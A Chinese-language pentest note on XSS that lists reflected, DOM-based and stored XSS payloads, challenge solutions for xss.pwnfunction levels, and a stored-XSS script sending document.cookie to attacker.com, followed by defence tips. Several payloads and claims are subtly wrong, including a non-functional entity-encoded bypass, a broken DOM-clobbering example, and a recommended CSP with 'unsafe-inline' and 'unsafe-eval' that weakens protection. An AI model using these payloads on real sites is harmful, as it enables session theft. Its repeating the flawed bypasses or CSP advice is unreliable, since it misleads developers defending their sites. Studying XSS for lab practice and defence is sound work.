渗透笔记(XSS跨站脚本攻击)

一、XSS攻击概述

XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的Web安全漏洞,攻击者通过在目标网站上注入恶意脚本,当其他用户访问该页面时,脚本会在用户浏览器中执行,从而窃取用户数据、会话令牌或进行其他恶意操作。

二、XSS攻击类型

1. 反射型XSS(Reflected XSS)

原理:恶意脚本作为请求的一部分发送到服务器,服务器将脚本"反射"回响应中并在用户浏览器执行。

示例

html 复制代码
<!-- 假设存在漏洞的URL -->
https://example.com/search?q=<script>alert('XSS')</script>

<!-- 服务器响应可能包含 -->
<div>您搜索的结果:<script>alert('XSS')</script></div>

bypass技巧(以DVWA靶场为例):

Level 1-11 常见绕过方法
  • Level 1 :直接注入<script>alert(1)</script>
  • Level 2 :使用事件处理程序<img src=x onerror=alert(1)>
  • Level 3 :利用URL编码<a href="javascript:alert(1)">click</a>
  • Level 4 :使用大小写混合<ScRiPt>alert(1)</ScRiPt>
  • Level 5 :利用HTML实体编码&lt;script&gt;alert(1)&lt;/script&gt;
  • Level 6 :使用SVG标签<svg/onload=alert(1)>
  • Level 7 :利用JavaScript伪协议<iframe src="javascript:alert(1)">
  • Level 8 :使用Unicode编码<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
  • Level 9 :通过闭合现有标签</textarea><script>alert(1)</script>
  • Level 10 :利用CSS表达式<div style="x:expression(alert(1))">
  • Level 11 :使用HTML5新特性<details open ontoggle=alert(1)>

2. DOM型XSS(DOM-based XSS)

原理:完全在客户端发生的XSS攻击,恶意脚本通过修改DOM环境而非插入HTML代码来执行。

xss.pwnfunction靶场示例

第一关:Ma Spagheti
javascript 复制代码
// 漏洞代码
document.write(decodeURIComponent(location.hash.slice(1)));

// 攻击payload
https://xss.pwnfunction.com/ma-spagheti.html#<img src=x onerror=alert(1)>
第二关:JEFFFF
javascript 复制代码
// 漏洞代码
document.getElementById('jeff').innerHTML = decodeURIComponent(location.hash.slice(1));

// 攻击payload
https://xss.pwnfunction.com/jeffff.html#<svg/onload=alert(1)>
第三关:Ugandan Knuckles
javascript 复制代码
// 漏洞代码
eval('var x = "' + location.hash.slice(1) + '"');

// 攻击payload
https://xss.pwnfunction.com/ugandan-knuckles.html#";alert(1);//
第四关:Ricardo Milos
javascript 复制代码
// 漏洞代码
document.querySelector('div').innerHTML = location.hash.slice(1).replace(/</g, '&lt;');

// 攻击payload(绕过HTML实体编码)
https://xss.pwnfunction.com/ricardo-milos.html#<img src=x onerror=alert(1)>

3. 存储型XSS(Stored XSS)

原理:恶意脚本被永久存储在目标服务器(如数据库、消息论坛、评论字段等),当其他用户访问受影响页面时自动执行。

示例

html 复制代码
<!-- 攻击者在评论区提交 -->
<script>
  fetch('https://attacker.com/steal?cookie='+document.cookie);
</script>

<!-- 其他用户访问该页面时会自动发送cookie到攻击者服务器 -->

三、高级XSS技术

1. 原型链污染(Prototype Pollution)

原理:通过修改JavaScript对象的原型链来污染基础对象,可能导致XSS漏洞。

示例

javascript 复制代码
// 漏洞代码
function merge(target, source) {
  for (let key in source) {
    if (typeof target[key] === 'object' && typeof source[key] === 'object') {
      merge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
}

// 攻击payload
const malicious = JSON.parse('{"__proto__": {"isAdmin": true}}');
merge({}, malicious);

// 现在所有对象都会继承isAdmin属性
console.log({}.isAdmin); // true

2. 基于DOM Clobbering的XSS

示例

html 复制代码
<!-- 通过DOM元素覆盖JavaScript变量 -->
<form id="xss"><input name="action" value="alert(1)"></form>
<script>
  // 原本的xss变量被DOM元素覆盖
  xss.action(); // 执行alert(1)
</script>

四、防御措施

  1. 输入验证和过滤

    • 使用白名单验证所有输入数据
    • 对特殊字符进行HTML实体编码
  2. 输出编码

    • 根据输出上下文使用适当的编码(HTML、JavaScript、URL等)
  3. 内容安全策略(CSP)

    http 复制代码
    Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'
  4. HttpOnly Cookie

    • 设置敏感cookie为HttpOnly,防止JavaScript访问
  5. 使用现代框架

    • React、Vue、Angular等框架有内置的XSS防护机制
相关推荐
被巨款砸中1 天前
前端视角下的 Web 安全攻防:XSS、CSRF、DDoS 一次看懂
前端·安全·xss
Bruce_Liuxiaowei2 天前
基于BeEF的XSS钓鱼攻击与浏览器劫持实验
前端·网络安全·ctf·xss
携欢2 天前
PortSwigger靶场之Stored XSS into HTML context with nothing encoded通关秘籍
前端·xss
喜葵3 天前
前端安全防护深度实践:从XSS到CSRF的完整安全解决方案
前端·安全·xss
mooyuan天天3 天前
DVWA靶场通关笔记-DOM型XSS(Impossible级别)
xss·dom型xss·xss漏洞·dvwa靶场
mooyuan天天3 天前
DVWA靶场通关笔记-反射型XSS(Impossible级别)
xss·反射型xss·xss漏洞·dvwa靶场
墨染 殇雪4 天前
web安全-XSS注入
前端·web安全·xss·跨站脚本
携欢5 天前
PortSwigger靶场之Reflected XSS into HTML context with nothing encoded通关秘籍
前端·xss
月弦笙音9 天前
【XSS】后端服务已经加了放xss攻击,前端还需要加么?
前端·javascript·xss
Xasxxs9 天前
【网络安全】XSS漏洞——PortSwigger靶场-DOM破坏
javascript·安全·web安全·xss